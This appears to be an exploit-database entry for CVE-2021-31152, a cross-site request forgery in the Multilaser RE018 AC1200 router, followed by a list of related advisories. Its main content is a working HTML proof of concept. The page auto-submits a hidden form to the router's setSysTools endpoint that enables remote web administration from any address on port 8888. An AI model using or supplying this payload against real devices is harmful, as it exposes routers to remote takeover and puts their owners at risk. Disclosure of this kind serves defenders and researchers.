Lucene search
Zdt1337DAY-ID-36125HistoryApr 21, 2021 - 12:00 a.m.
Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access) Vulnerability
2021-04-2100:00:00
0day.today
30
0.004 Low
EPSS
Percentile
74.9%
# Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
# Exploit Author: Rodolfo Mariano
# Version: Firmware V02.03.01.45_pt
# CVE: CVE-2021-31152
#Exploit code:
<html>
<body>
<form action="http://192.168.0.1/goform/setSysTools" method="POST">
<input name="module4" value="remoteWeb" type="hidden">
<input name="remoteWebType" value="any" type="hidden">
<input name="remoteWebIP" value="" type="hidden">
<input name="remoteWebPort" value="8888" type="hidden">
<input type="submit" value="Submit request">
</form>
</body>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# 0day.today [2021-10-25] #Related
cvelist
cvelist
CVE-2021-31152
2021-04-14 00:00:00
nvd
nvd
CVE-2021-31152
2021-04-14 14:15:14
packetstorm
packetstorm
Multilaser Router RE018 AC1200 Cross Site Request Forgery
2021-04-21 00:00:00
Multilaser RE160V / RE160 URL Manipulation Access Bypass
2024-03-04 00:00:00
cve
cve
CVE-2021-31152
2021-04-14 14:15:14
prion
prion
Cross site request forgery (csrf)
2021-04-14 14:15:00
zdt
zdt
Multilaser RE160V / RE160 URL Manipulation Access Bypass Vulnerability
2024-03-05 00:00:00